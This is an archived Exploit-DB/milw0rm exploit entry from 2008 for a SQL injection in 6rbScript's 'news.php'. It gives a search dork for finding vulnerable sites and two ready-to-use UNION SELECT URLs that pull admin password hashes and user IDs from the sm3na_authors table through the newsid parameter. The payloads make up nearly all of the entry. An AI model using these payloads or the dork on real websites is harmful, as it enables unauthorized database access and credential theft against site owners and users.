6rbScript - 'news.php' SQL Injection

EDB-ID:

5663

CVE:

N/A

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2008-05-21

##########################################################
#
#	6rbScript SQL Injection Vulnerability
#
#	by Hussin X
#
#	Home: www.tryag.cc/cc
#
#	darkangel_g85[at]Yahoo[DoT]com
#
#       DoRK: Powered by 6rbScript
##########################################################


##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################

Greetz: All IRAQI And all HACKER

###########################################################

# milw0rm.com [2008-05-21]